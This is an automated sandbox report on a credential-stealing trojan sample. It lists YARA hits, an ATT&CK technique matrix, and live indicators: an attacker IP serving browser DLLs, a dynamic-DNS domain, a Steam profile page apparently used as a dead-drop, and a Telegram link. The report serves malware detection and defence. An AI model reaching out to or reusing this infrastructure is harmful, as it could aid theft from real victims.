                          Source: Yara match File source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CC30C40 sqlite3_bind_zeroblob,2_2_6CC30C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CC30D60 sqlite3_bind_parameter_name,2_2_6CC30D60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB58EA0 sqlite3_clear_bindings,2_2_6CB58EA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CC30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6CC30B40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB56410 bind,WSAGetLastError,2_2_6CB56410
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB560B0 listen,WSAGetLastError,2_2_6CB560B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB5C030 sqlite3_bind_parameter_count,2_2_6CB5C030
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB56070 PR_Listen,2_2_6CB56070
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB5C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6CB5C050
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CAE22D0 sqlite3_bind_blob,2_2_6CAE22D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB563C0 PR_Bind,2_2_6CB563C0
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 56 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 161 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                          [Behavior graph image] Behavior Graph ID: 1540306, Sample: UMrFwHyjUi.exe, Startdate: 23/10/2024, Architecture: WINDOWS, Score: 100

                          Source | Detection | Scanner | Label | Link
                          UMrFwHyjUi.exe | 66% | ReversingLabs | Win32.Trojan.LummaC |
                          UMrFwHyjUi.exe | 100% | Joe Sandbox ML | |

                          Source | Detection | Scanner | Label | Link
                          C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                          C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                          C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                          No Antivirus matches
                          No Antivirus matches
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          steamcommunity.com | 92.122.104.90 | true | true | | unknown
                          cowod.hopto.org | unknown | unknown | false | | unknown

                          Name | Malicious | Antivirus Detection | Reputation
                          https://95.217.220.103/freebl3.dll | true | | unknown
                          https://95.217.220.103/nss3.dll | true | | unknown
                          https://95.217.220.103/vcruntime140.dll | true | | unknown
                          https://95.217.220.103/mozglue.dll | true | | unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                unknown
                                                                                https://95.217.220.103/UUMrFwHyjUi.exe, 00000002.00000003.2560144909.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drfalse
                                                                                    unknown
                                                                                    https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                      unknown
                                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#UMrFwHyjUi.exefalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.mozilla.com/en-US/blocklist/UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.drfalse
                                                                                        unknown
                                                                                        https://mozilla.org0/UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://95.217.220.103/rosoftUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988407679.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                            unknown
                                                                                            http://store.steampowered.com/privacy_agreement/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                              unknown
                                                                                              https://store.steampowered.com/points/shop/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://t.me/lpnjokeUMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaUMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drfalse
                                                                                                  unknown
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://sketchfab.comUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.ecosia.org/newtab/UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://lv.queniujq.cnUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brJDGCFB.2.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.youtube.com/UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                        unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://95.217.220.103/.UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&amUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                            unknown
                                                                                                            https://95.217.220.103/-UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://steamcommunity.com/profiles/76561199786602107/inventory/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                unknown
                                                                                                                https://95.217.220.103/9MUMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://95.217.220.103/)UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zUMrFwHyjUi.exefalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.google.com/recaptcha/UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://checkout.steampowered.com/UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://95.217.220.10376561199786602107[1].htm.2.drfalse
                                                                                                                          unknown
                                                                                                                          https://store.steampoUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFHJEGI.2.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://store.steampowered.com/;UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=englUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/about/76561199786602107[1].htm.2.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://cowod.hoptoECAKEHIUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://steamcommunity.com/my/wishlist/UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFJDGCFB.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
92.122.104.90 | steamcommunity.com | European Union | 16625 | AKAMAI-ASUS | true
95.217.220.103 | unknown | Germany | 24940 | HETZNER-ASDE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540306
Start date and time: 2024-10-23 17:04:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: UMrFwHyjUi.exe
renamed because original name is a hash value
Original Sample Name: 0d90ef55d1b1cb43ccb8fd30bbeba1a4.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/24@2/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 94
• Number of non-executed functions: 251
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target UMrFwHyjUi.exe, PID 4432 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: UMrFwHyjUi.exe
Time | Type | Description
11:05:26 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:05:32 | API Interceptor | 1x Sleep call for process: UMrFwHyjUi.exe modified
